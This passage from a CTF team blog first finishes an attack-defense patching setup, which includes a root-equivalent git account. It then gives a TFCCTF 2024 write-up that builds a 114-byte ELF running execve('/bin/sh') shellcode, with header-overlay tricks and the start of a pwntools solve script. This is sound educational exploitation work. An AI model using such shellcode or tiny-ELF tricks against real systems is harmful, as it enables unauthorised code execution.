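    run_push_options()
```

<p>One difference from the shell version: <code class="language-plaintext highlighter-rouge">eval</code> runs every option inside the hook’s own shell, so a <code class="language-plaintext highlighter-rouge">cd</code> in one option affects the next, whereas this sketch starts a fresh shell per option.</p>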

<h2 id="configuration">Configuration</h2>

<p>With fairly minimal configuration, we can get this all set up:</p>

<ol>
  <li>Create a new user <code class="language-plaintext highlighter-rouge">git</code> w/ the same UID/GID as <code class="language-plaintext highlighter-rouge">root</code> and w/ <code class="language-plaintext highlighter-rouge">git-shell</code> as their login shell:
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>useradd <span class="nt">-ou</span> 0 <span class="nt">-g</span> 0 <span class="nt">--system</span> <span class="nt">--disabled-password</span> <span class="nt">--create-home</span> <span class="nt">--shell</span> /usr/bin/git-shell git
</code></pre></div>    </div>
  </li>
  <li>Generate SSH keys for the <code class="language-plaintext highlighter-rouge">git</code> user:
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh-keygen <span class="nt">-t</span> ed25519 <span class="nt">-N</span> <span class="s1">''</span> <span class="nt">-f</span> /home/git/.ssh/id_ed25519
</code></pre></div>    </div>
  </li>
  <li>Install <code class="language-plaintext highlighter-rouge">authorized_keys</code>, disable password authentication, install <code class="language-plaintext highlighter-rouge">post-receive</code> hooks, etc:
    <div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mv </span>authorized_keys /home/git/.ssh/authorized_keys <span class="o">&amp;&amp;</span> <span class="nb">chmod </span>640 /home/git/.ssh/authorized_keys
<span class="nb">echo</span> <span class="s2">"PasswordAuthentication no"</span> <span class="o">&gt;&gt;</span> /etc/ssh/sshd_config
<span class="nb">mkdir</span> <span class="nt">-p</span> /home/git/hooks <span class="o">&amp;&amp;</span> <span class="nb">mv </span>post-receive /home/git/hooks/post-receive <span class="o">&amp;&amp;</span> <span class="nb">chmod </span>755 /home/git/hooks/post-receive
</code></pre></div>    </div>
  </li>
</ol>

<p>Be sure to run <code class="language-plaintext highlighter-rouge">systemctl restart sshd</code> after making these changes.</p>

<p>The following settings must be made for the <code class="language-plaintext highlighter-rouge">git</code> user:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git config <span class="nt">--global</span> receive.denyCurrentBranch updateInstead
git config <span class="nt">--global</span> receive.advertisePushOptions <span class="nb">true
</span>git config <span class="nt">--global</span> core.hooksPath /home/git/hooks/
</code></pre></div></div>

<p>These settings allow pushing to non-bare repos, allow the use of <code class="language-plaintext highlighter-rouge">--push-option</code>, and allow the installation of global hooks.
The following settings are also recommended:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git config <span class="nt">--global</span> user.name <span class="s2">"vulnbox"</span>
git config <span class="nt">--global</span> user.email <span class="s2">"vulnbox@example.com"</span>
git config <span class="nt">--global</span> init.defaultBranch main
</code></pre></div></div>

<p>Now, upon the release of services, check them into Git.
If there is any mutable data, remove it from Git tracking to avoid unstaged data issues.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git init <span class="o">&amp;&amp;</span> git stage <span class="nb">.</span> <span class="o">&amp;&amp;</span> git commit <span class="nt">-m</span> <span class="s2">"initial commit"</span>
git <span class="nb">rm</span> <span class="nt">-r</span> <span class="nt">--cached</span> data/ <span class="o">&amp;&amp;</span> git commit <span class="nt">-m</span> <span class="s2">"do not track mutable data"</span>
</code></pre></div></div>

<p>And that’s all you need. The SSH server will handle anyone connecting to the box via Git, and plumb them into <code class="language-plaintext highlighter-rouge">git-shell</code> so that cloning/pulling/pushing works.</p>

<p>If you encounter errors of the form <code class="language-plaintext highlighter-rouge">! [remote rejected]</code>, ensure that there are no uncommitted changes in any service. Be sure to remove mutable state from Git tracking to prevent this.</p>

<p>Hopefully this writeup is helpful to any teams new to the attack-defense format. If you find it useful, or have come up with any improvements that have worked for your team - let us know! We’re contactable over <a href="https://mastodon.social/@maplebaconctf">Mastodon</a>, <a href="https://twitter.com/maplebaconctf">Twitter</a>, and <a href="mailto:maple.bacon.ctf@gmail.com">email</a>.</p>]]></content><author><name>apropos</name></author><summary type="html"><![CDATA[This is a writeup of the patching setup Maple Bacon used in FAUST 2024.]]></summary></entry><entry><title type="html">[TFCCTF 2024] Santa’s Little Helper</title><link href="https://maplebacon.org/2024/08/tfcctf-santas-little-helper/" rel="alternate" type="text/html" title="[TFCCTF 2024] Santa’s Little Helper" /><published>2024-08-05T00:00:00+00:00</published><updated>2024-08-05T00:00:00+00:00</updated><id>https://maplebacon.org/2024/08/tfcctf-santas-little-helper</id><content type="html" xml:base="https://maplebacon.org/2024/08/tfcctf-santas-little-helper/"><![CDATA[<p>Ayyy misc pwn.</p>

<h3 id="challenge">Challenge</h3>

<blockquote>
  <p>Santa doesn’t have a lot of room left in his sleigh. Help him fit one more item</p>
</blockquote>

<p>The binary is provided; decompiling it with Ghidra gives:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">undefined8</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>

<span class="p">{</span>
    <span class="kt">int</span> <span class="n">iVar1</span><span class="p">;</span>
    <span class="kt">long</span> <span class="n">in_FS_OFFSET</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">local_ac</span><span class="p">;</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">local_a0</span><span class="p">;</span>
    <span class="kt">char</span> <span class="o">*</span><span class="n">local_98</span><span class="p">;</span>
    <span class="n">undefined8</span> <span class="n">local_90</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">local_88</span> <span class="p">[</span><span class="mi">120</span><span class="p">];</span>
    <span class="kt">long</span> <span class="n">local_10</span><span class="p">;</span>
    
    <span class="n">local_10</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">long</span> <span class="o">*</span><span class="p">)(</span><span class="n">in_FS_OFFSET</span> <span class="o">+</span> <span class="mh">0x28</span><span class="p">);</span>
    <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="n">local_88</span><span class="p">,</span><span class="mh">0x78</span><span class="p">);</span>
    <span class="n">local_90</span> <span class="o">=</span> <span class="mh">0x10102464c457f</span><span class="p">;</span>
    <span class="k">for</span> <span class="p">(</span><span class="n">local_ac</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">local_ac</span> <span class="o">&lt;</span> <span class="mi">8</span><span class="p">;</span> <span class="n">local_ac</span> <span class="o">=</span> <span class="n">local_ac</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">local_88</span><span class="p">[(</span><span class="kt">long</span><span class="p">)</span><span class="n">local_ac</span> <span class="o">+</span> <span class="o">-</span><span class="mi">8</span><span class="p">]</span> <span class="o">!=</span> <span class="n">local_88</span><span class="p">[</span><span class="n">local_ac</span><span class="p">])</span> <span class="p">{</span>
        <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="s">"Not an ELF file</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="mh">0x10</span><span class="p">);</span>
                        <span class="cm">/* WARNING: Subroutine does not return */</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="n">iVar1</span> <span class="o">=</span> <span class="n">memfd_create</span><span class="p">(</span><span class="s">"program"</span><span class="p">,</span><span class="mi">0</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">iVar1</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="s">"Failed to create memfd</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="mh">0x17</span><span class="p">);</span>
                        <span class="cm">/* WARNING: Subroutine does not return */</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">write</span><span class="p">(</span><span class="n">iVar1</span><span class="p">,</span><span class="n">local_88</span><span class="p">,</span><span class="mh">0x78</span><span class="p">);</span>
    <span class="n">local_a0</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
    <span class="n">local_98</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="mh">0x0</span><span class="p">;</span>
    <span class="n">iVar1</span> <span class="o">=</span> <span class="n">fexecve</span><span class="p">(</span><span class="n">iVar1</span><span class="p">,</span><span class="o">&amp;</span><span class="n">local_a0</span><span class="p">,</span><span class="o">&amp;</span><span class="n">local_98</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">iVar1</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">write</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="s">"Failed to execute</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="mh">0x12</span><span class="p">);</span>
                        <span class="cm">/* WARNING: Subroutine does not return */</span>
        <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">local_10</span> <span class="o">!=</span> <span class="o">*</span><span class="p">(</span><span class="kt">long</span> <span class="o">*</span><span class="p">)(</span><span class="n">in_FS_OFFSET</span> <span class="o">+</span> <span class="mh">0x28</span><span class="p">))</span> <span class="p">{</span>
                        <span class="cm">/* WARNING: Subroutine does not return */</span>
        <span class="n">__stack_chk_fail</span><span class="p">();</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Looks fairly straightforward – essentially, it reads up to 120 bytes of input (an ELF file) that must start with <code class="language-plaintext highlighter-rouge">7f 45 4c 46 02 01 01 00</code> (confirmed with some dynamic debugging on the <code class="language-plaintext highlighter-rouge">for</code> loop), writes the input into an anonymous file created by <code class="language-plaintext highlighter-rouge">memfd_create</code>, and executes that file. If the file does something like <code class="language-plaintext highlighter-rouge">execve("/bin/sh", -, -)</code>, we get a shell. Simple.</p>
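<p>To see where those eight bytes come from: in the decompilation, <code class="language-plaintext highlighter-rouge">local_88[local_ac - 8]</code> reads the bytes of <code class="language-plaintext highlighter-rouge">local_90</code>, which sits directly below the input buffer on the stack. A minimal Python sketch of the same check (the function names here are made up for illustration):</p>

```python
import struct

# Constant stored in local_90 by the decompiled main().
MAGIC = 0x10102464C457F


def expected_prefix() -> bytes:
    """The 8 bytes the loop compares against: MAGIC as a little-endian u64."""
    return struct.pack("<Q", MAGIC)


def passes_check(data: bytes) -> bool:
    """Mimic the byte-by-byte comparison done by the for loop."""
    return data[:8] == expected_prefix()


if __name__ == "__main__":
    # Hex dump of the required prefix, one byte at a time.
    print(expected_prefix().hex(" "))
```

<p>Byte 4 is <code class="language-plaintext highlighter-rouge">02</code>, so the check forces a 64-bit ELF, which matters for the header sizes later on.</p>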

<h3 id="first-attempt-compiling-c">First Attempt: compiling C</h3>

<p>Since we need a 64ELF (for the header constraint), my first attempt was to compile bare assembly within a C program:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">__asm__</span> <span class="p">(</span>
        <span class="s">"movq $0x0068732f6e69622f, %%rbx</span><span class="se">\n\t</span><span class="s">"</span> <span class="c1">// '/bin/sh\x00'</span>
        <span class="s">"push %%rbx</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="s">"movq %%rsp, %%rdi</span><span class="se">\n\t</span><span class="s">"</span> <span class="c1">// rdi points to '/bin/sh', rsi and rdx don't really matter for /bin/sh</span>
        <span class="s">"movl $0x3b, %%eax</span><span class="se">\n\t</span><span class="s">"</span> <span class="c1">// rax = 0x3b for execve</span>
        <span class="s">"syscall</span><span class="se">\n\t</span><span class="s">"</span>
        <span class="o">:</span>
        <span class="o">:</span>
        <span class="o">:</span> <span class="s">"rdi"</span><span class="p">,</span> <span class="s">"rbx"</span><span class="p">,</span> <span class="s">"eax"</span>
    <span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>However, the resulting ELF is 15KB (more than 100x the size of the acceptable input). Even with some optimization, its size is not even close to 120 bytes. So this is definitely not the way – the problem with compiling a C program to an ELF is that the compiler includes too many unnecessary parts such as <code class="language-plaintext highlighter-rouge">.plt</code>, <code class="language-plaintext highlighter-rouge">.init</code>, <code class="language-plaintext highlighter-rouge">.bss</code>. We don’t need any of those – we just need it to jump to the shellcode and execute it. This raises the question – what is the bare minimum for a 64ELF?</p>

<h3 id="the-smallest-elfs">The smallest ELFs?</h3>
<p>This <a href="https://github.com/tmpout/elfs">GitHub repo</a> shows some interesting ELFs. <code class="language-plaintext highlighter-rouge">golfed.polymorphic.execve.x86</code> is a 76-byte ELF that gets a shell, but its first eight bytes do not match the restriction of this challenge. <code class="language-plaintext highlighter-rouge">base.bin</code> is a 64ELF that starts with <code class="language-plaintext highlighter-rouge">7f 45 4c 46 02 01 01 00</code> and is 128 bytes. In particular, it contains only the ELF header, the program header, and three x86 instructions. So presumably, the ELF header and the program header are the bare minimum for a valid ELF. The problem is that the two headers together are already 120 bytes! So, without some tricks, we won’t be able to do anything. Before diving into those tricks, let’s take a look at the semantics of those headers.</p>

<h3 id="a-little-detour-to-the-64elf-header-and-program-header-ph-table">A little detour to the 64ELF header and Program Header (Ph) table</h3>

<p>The 64ELF header has a fixed size of 0x40 bytes:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span>
<span class="p">{</span>
  <span class="kt">unsigned</span> <span class="kt">char</span>	<span class="n">e_ident</span><span class="p">[</span><span class="n">EI_NIDENT</span><span class="p">];</span>	<span class="cm">/* Magic number and other info */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_type</span><span class="p">;</span>			<span class="cm">/* Object file type */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_machine</span><span class="p">;</span>		<span class="cm">/* Architecture */</span>
  <span class="n">Elf64_Word</span>	<span class="n">e_version</span><span class="p">;</span>		<span class="cm">/* Object file version */</span>
  <span class="n">Elf64_Addr</span>	<span class="n">e_entry</span><span class="p">;</span>		<span class="cm">/* Entry point virtual address */</span>
  <span class="n">Elf64_Off</span>	    <span class="n">e_phoff</span><span class="p">;</span>		<span class="cm">/* Program header table file offset */</span>
  <span class="n">Elf64_Off</span>	    <span class="n">e_shoff</span><span class="p">;</span>		<span class="cm">/* Section header table file offset */</span>
  <span class="n">Elf64_Word</span>	<span class="n">e_flags</span><span class="p">;</span>		<span class="cm">/* Processor-specific flags */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_ehsize</span><span class="p">;</span>		<span class="cm">/* ELF header size in bytes */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_phentsize</span><span class="p">;</span>	<span class="cm">/* Program header table entry size */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_phnum</span><span class="p">;</span>		<span class="cm">/* Program header table entry count */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_shentsize</span><span class="p">;</span>	<span class="cm">/* Section header table entry size */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_shnum</span><span class="p">;</span>		<span class="cm">/* Section header table entry count */</span>
  <span class="n">Elf64_Half</span>	<span class="n">e_shstrndx</span><span class="p">;</span>		<span class="cm">/* Section header string table index */</span>
<span class="p">}</span> <span class="n">Elf64_Ehdr</span><span class="p">;</span>
</code></pre></div></div>
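<p>As a sanity check on the layout above, here is a small Python sketch that walks the fields of <code class="language-plaintext highlighter-rouge">Elf64_Ehdr</code> and computes each field’s file offset. The <code class="language-plaintext highlighter-rouge">struct</code> format codes are my own transcription of the C types (Half = 2 bytes, Word = 4, Addr/Off = 8), not something taken from the challenge:</p>

```python
import struct

# (field name, struct format code) in declaration order, little-endian.
EHDR_FIELDS = [
    ("e_ident", "16s"),
    ("e_type", "H"),
    ("e_machine", "H"),
    ("e_version", "I"),
    ("e_entry", "Q"),
    ("e_phoff", "Q"),
    ("e_shoff", "Q"),
    ("e_flags", "I"),
    ("e_ehsize", "H"),
    ("e_phentsize", "H"),
    ("e_phnum", "H"),
    ("e_shentsize", "H"),
    ("e_shnum", "H"),
    ("e_shstrndx", "H"),
]


def ehdr_offsets():
    """Return ({field: offset}, total_size) for a packed Elf64_Ehdr."""
    offsets, pos = {}, 0
    for name, code in EHDR_FIELDS:
        offsets[name] = pos
        pos += struct.calcsize("<" + code)
    return offsets, pos


if __name__ == "__main__":
    offsets, size = ehdr_offsets()
    for name, off in offsets.items():
        print(f"{off:#04x}  {name}")
    print(f"total: {size:#x}")
```

<p>The offsets of <code class="language-plaintext highlighter-rouge">e_entry</code>, <code class="language-plaintext highlighter-rouge">e_phoff</code>, <code class="language-plaintext highlighter-rouge">e_phnum</code> and <code class="language-plaintext highlighter-rouge">e_shnum</code> are the ones that get patched later in this post.</p>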

<p>The first 0x10 bytes of an ELF file are its identifier – an ELF file always starts with the four magic bytes <code class="language-plaintext highlighter-rouge">7f 45 4c 46</code>. The next 5 bytes indicate its fundamental properties, such as endianness and the class of the ELF file (32ELF vs 64ELF). These are followed by 7 bytes of padding (for future extension, <strong>foreshadowing</strong>). The remaining ELF header fields are described in the comments above. Since the ELF header size is fixed, I tried to patch out the program header by setting <code class="language-plaintext highlighter-rouge">e_phnum = 0</code>. However, that resulted in</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bash: ./base.bin: cannot execute binary file: Exec format error
</code></pre></div></div>

<p>Therefore, my conclusion is that an ELF must have a program header. So, I tried to shrink the size of the program header. In <code class="language-plaintext highlighter-rouge">base.bin</code>, <code class="language-plaintext highlighter-rouge">e_phentsize = 0x38</code>. I tried to change that value, but it also resulted in the above error. So, let’s take a look at the program header struct:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span>
<span class="p">{</span>
  <span class="n">Elf64_Word</span>	<span class="n">p_type</span><span class="p">;</span>			<span class="cm">/* Segment type */</span>
  <span class="n">Elf64_Word</span>	<span class="n">p_flags</span><span class="p">;</span>		<span class="cm">/* Segment flags */</span>
  <span class="n">Elf64_Off</span>	    <span class="n">p_offset</span><span class="p">;</span>		<span class="cm">/* Segment file offset */</span>
  <span class="n">Elf64_Addr</span>	<span class="n">p_vaddr</span><span class="p">;</span>		<span class="cm">/* Segment virtual address */</span>
  <span class="n">Elf64_Addr</span>	<span class="n">p_paddr</span><span class="p">;</span>		<span class="cm">/* Segment physical address */</span>
  <span class="n">Elf64_Xword</span>	<span class="n">p_filesz</span><span class="p">;</span>		<span class="cm">/* Segment size in file */</span>
  <span class="n">Elf64_Xword</span>	<span class="n">p_memsz</span><span class="p">;</span>		<span class="cm">/* Segment size in memory */</span>
  <span class="n">Elf64_Xword</span>	<span class="n">p_align</span><span class="p">;</span>		<span class="cm">/* Segment alignment */</span>
<span class="p">}</span> <span class="n">Elf64_Phdr</span><span class="p">;</span>
</code></pre></div></div>

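<p>So, presumably, the program header has a fixed size as well (0x38 bytes, matching <code class="language-plaintext highlighter-rouge">e_phentsize</code>).</p>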
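<p>The size of <code class="language-plaintext highlighter-rouge">Elf64_Phdr</code> can be checked the same way as the ELF header. This is a rough sketch; the format string is my transcription of the struct above (two 4-byte words followed by six 8-byte fields):</p>

```python
import struct

EHDR_SIZE = 0x40                                 # size of Elf64_Ehdr
PHDR_FMT = "<IIQQQQQQ"                           # p_type, p_flags, then six 8-byte fields
PHDR_SIZE = struct.calcsize(PHDR_FMT)

# Smallest "honest" file: one ELF header plus one program header, no code.
HEADERS_TOTAL = EHDR_SIZE + PHDR_SIZE

if __name__ == "__main__":
    print(hex(PHDR_SIZE), HEADERS_TOTAL)
```

<p>This agrees with <code class="language-plaintext highlighter-rouge">e_phentsize = 0x38</code> in <code class="language-plaintext highlighter-rouge">base.bin</code>, and the two headers alone already use up the entire 120-byte input.</p>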

<h3 id="trick-1-header-overlay">Trick 1: Header overlay</h3>

<p>As detailed <a href="https://www.muppetlabs.com/~breadbox/software/tiny/teensy.html">here</a>, if the end of the ELF header matches with the start of the program header, we can <em>shift</em> the start of the program header by changing the value of <code class="language-plaintext highlighter-rouge">e_phoff</code> (the offset of the program header from the start of the binary). Decompiling <code class="language-plaintext highlighter-rouge">base.bin</code> with Ghidra, we see:</p>

<p><img src="/assets/images/tfcctf/headers.png" alt="headers" /></p>

<p>Hmmm, doesn’t match exactly. But the 0x38<em>th</em> (in this post, all indices are 0-indexed unless otherwise specified) byte (the number of program headers) is 0x01, which matches the first byte of the program header. To make the rest match, I patched the 0x3c<em>th</em> byte to be 0x05. That doesn’t cause any issues – the reason being <code class="language-plaintext highlighter-rouge">e_shoff = 0</code>, indicating there is no section header. Great, so the <em>effective</em> size of the program header is reduced by 8 bytes (the size of the overlay)!</p>
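<p>The overlay can be illustrated with a few lines of Python. This is a sketch under assumptions: I take <code class="language-plaintext highlighter-rouge">e_shentsize</code>, <code class="language-plaintext highlighter-rouge">e_shstrndx</code> and the unpatched <code class="language-plaintext highlighter-rouge">e_shnum</code> to be 0 in <code class="language-plaintext highlighter-rouge">base.bin</code>, and the segment to be a readable and executable <code class="language-plaintext highlighter-rouge">PT_LOAD</code> (flags 5), which is what the 0x05 patch suggests:</p>

```python
import struct

PT_LOAD = 1            # p_type of a loadable segment
PF_X, PF_R = 0x1, 0x4  # execute / read permission bits for p_flags


def ehdr_tail(e_shnum: int) -> bytes:
    """Last 8 bytes of the ELF header (file offsets 0x38..0x3f):
    e_phnum, e_shentsize, e_shnum, e_shstrndx.
    e_shentsize = 0 and e_shstrndx = 0 are assumptions about base.bin."""
    return struct.pack("<HHHH", 1, 0, e_shnum, 0)


def phdr_head() -> bytes:
    """First 8 bytes of the program header: p_type, p_flags."""
    return struct.pack("<II", PT_LOAD, PF_R | PF_X)


if __name__ == "__main__":
    print("unpatched tail matches:", ehdr_tail(0) == phdr_head())
    print("patched tail matches:  ", ehdr_tail(5) == phdr_head())
```

<p>Once the bytes agree, pointing <code class="language-plaintext highlighter-rouge">e_phoff</code> at 0x38 lets the same 8 bytes serve as both the end of the ELF header and the start of the program header.</p>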

<h3 id="the-shortest-x86-shellcode">The shortest x86 shellcode?</h3>

<p>So, the effective total size of the headers is reduced to 112 bytes. But we still need to place the actual shellcode into the ELF. Translating the above C code into x86:</p>

<pre><code class="language-asm">mov rbx, 0x0068732f6e69622f
push rbx 
mov rdi, rsp 
mov eax, 0x3b
syscall
</code></pre>

<p>This gives a shell and is only 21 bytes which is fairly short but we can make it even shorter by replacing the second and third <code class="language-plaintext highlighter-rouge">mov</code> with <code class="language-plaintext highlighter-rouge">push + pop</code>:</p>

<pre><code class="language-asm">mov rbx, 0x0068732f6e69622f
push rbx
push rsp
pop rdi
push 0x3b
pop rax
syscall
</code></pre>

<p>Assemble it and we get 18 bytes! (Please let me know if you can craft an even shorter x86 shellcode.) So with header overlay, we have a total of 130 bytes. We still need to reduce it by at least 10 bytes!</p>
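<p>For the byte counting, here is the <code class="language-plaintext highlighter-rouge">push</code>/<code class="language-plaintext highlighter-rouge">pop</code> version of the shellcode written out as raw bytes. The encodings are hand-assembled for illustration rather than copied from an assembler’s output, so treat them as a sketch:</p>

```python
# Each entry: (assembly text, machine-code bytes), hand-encoded.
SHELLCODE = [
    ("mov rbx, 0x0068732f6e69622f", bytes.fromhex("48bb") + b"/bin/sh\x00"),
    ("push rbx", bytes.fromhex("53")),
    ("push rsp", bytes.fromhex("54")),
    ("pop rdi", bytes.fromhex("5f")),
    ("push 0x3b", bytes.fromhex("6a3b")),
    ("pop rax", bytes.fromhex("58")),
    ("syscall", bytes.fromhex("0f05")),
]

HEADERS_AFTER_TRICK_1 = 0x40 + 0x38 - 8  # ELF header + program header - overlay
LIMIT = 0x78                             # bytes read by the challenge binary


def shellcode_bytes() -> bytes:
    """Concatenate the encoded instructions in order."""
    return b"".join(code for _, code in SHELLCODE)


if __name__ == "__main__":
    for asm, code in SHELLCODE:
        print(f"{len(code):2d}  {asm}")
    total = HEADERS_AFTER_TRICK_1 + len(shellcode_bytes())
    print("shellcode:", len(shellcode_bytes()), "total:", total, "over by:", total - LIMIT)
```

<p>The 10-byte <code class="language-plaintext highlighter-rouge">mov</code> with its 64-bit immediate dominates the size, which is worth keeping in mind for what follows.</p>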

<p>(Side note: While writing this writeup, I realized that it might have been easier if I changed <code class="language-plaintext highlighter-rouge">e_machine</code> to be <code class="language-plaintext highlighter-rouge">i386</code> so that the program header is smaller. )</p>

<h3 id="trick-2-program-header-and-text-overlay">Trick 2: Program header and <code class="language-plaintext highlighter-rouge">.text</code> overlay</h3>

<p>Similar to the first trick, why don’t we try to overlay the program header and the <code class="language-plaintext highlighter-rouge">.text</code> section? After all, they are just bytes! This works up to 8 bytes – I removed the last 8 bytes of the program header (<code class="language-plaintext highlighter-rouge">p_align</code>) and appended the shellcode directly after it (adjusting <code class="language-plaintext highlighter-rouge">e_entry</code> accordingly). Apparently, neither the file parser nor the virtual address space cares about the segment alignment. If we go beyond 8 bytes, we are <em>overwriting</em> <code class="language-plaintext highlighter-rouge">p_memsz</code>, and that causes an error because there is simply not that much memory (as we would be writing the most significant byte of <code class="language-plaintext highlighter-rouge">p_memsz</code>)!</p>

<p>122 bytes! 2 more to go!</p>

<h3 id="trick-3-store-data-within-the-elf-header">Trick 3: Store data within the ELF header</h3>

<p>At first, it seemed a bit hopeless – to my knowledge, the x86 shellcode is optimized as much as possible and the effective size of the headers cannot be reduced further. However, I recalled from <a href="https://www.muppetlabs.com/~breadbox/software/tiny/teensy.html">here</a> that instructions can be placed inside the ELF header padding. Unfortunately, I couldn’t make that work with header overlay (it works without header overlay). But, in a similar way, I thought we could place the <code class="language-plaintext highlighter-rouge">'/bin/sh'</code> string there instead. And that worked, by overwriting the 8<em>th</em> byte and the padding (8 bytes of data in total)! The final shellcode looks like:</p>

<pre><code class="language-asm">; in ./sc.asm
mov rdi, 0x0400008 ; where /bin/sh is 
push 0x3b
pop rax
syscall
</code></pre>

<p>This works because PIE is not enabled (for more about PIE, see <a href="https://codywu2010.wordpress.com/2014/11/29/about-elf-pie-pic-and-else/">here</a>).</p>
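<p>Here is a rough accounting of the final layout. Two things are assumptions on my part: that the binary is loaded at <code class="language-plaintext highlighter-rouge">0x400000</code> (inferred from the <code class="language-plaintext highlighter-rouge">0x0400008</code> in <code class="language-plaintext highlighter-rouge">sc.asm</code>), and that the assembler emits the 5-byte <code class="language-plaintext highlighter-rouge">mov edi, imm32</code> form for the first instruction. The bytes below are hand-encoded, not taken from the real <code class="language-plaintext highlighter-rouge">sc</code> file:</p>

```python
LOAD_BASE = 0x400000   # assumed p_vaddr of the single PT_LOAD segment
STRING_OFFSET = 0x8    # '/bin/sh\0' stored at e_ident[8..15]

# Hand-encoded: mov edi, 0x400008 ; push 0x3b ; pop rax ; syscall
FINAL_SHELLCODE = bytes.fromhex("bf08004000" "6a3b" "58" "0f05")

EHDR_SIZE, PHDR_SIZE = 0x40, 0x38
OVERLAY_EHDR_PHDR = 8  # trick 1: program header starts at 0x38
OVERLAY_PHDR_CODE = 8  # trick 2: shellcode starts on top of p_align


def final_size() -> int:
    """Total file size after all three tricks."""
    return (EHDR_SIZE + PHDR_SIZE
            - OVERLAY_EHDR_PHDR - OVERLAY_PHDR_CODE
            + len(FINAL_SHELLCODE))


def string_address() -> int:
    """Address the shellcode loads into rdi (the immediate of the mov)."""
    return int.from_bytes(FINAL_SHELLCODE[1:5], "little")


if __name__ == "__main__":
    print("file size:", final_size())
    print("string at:", hex(string_address()))
```

<p>Moving the string into the header drops the 10-byte <code class="language-plaintext highlighter-rouge">mov rbx, imm64</code> and the two stack instructions, which is where the savings come from.</p>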

<p>114 bytes and flag! Ayyy!</p>

<h3 id="solve-script">Solve script</h3>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s">'debug'</span>
<span class="c1"># io = remote('challs.tfcctf.com', 32501)
</span><span class="n">io</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">'./santas_little_helper'</span><span class="p">)</span>

<span class="n">bs</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">()</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'./base.bin'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">header</span><span class="p">:</span> 
    <span class="n">arr</span> <span class="o">=</span> <span class="n">header</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="n">tmp</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">(</span><span class="n">arr</span><span class="p">[:</span><span class="mh">0x40</span><span class="p">])</span>
    <span class="n">tmp</span> <span class="o">+=</span> <span class="n">arr</span><span class="p">[</span><span class="mh">0x48</span><span class="p">:</span><span class="mh">0x78</span><span class="o">-</span><span class="mh">0x8</span><span class="p">]</span> <span class="c1"># trick 1 + trick 2: don't need the beginning and the end of the Ph (program header) for the overlays
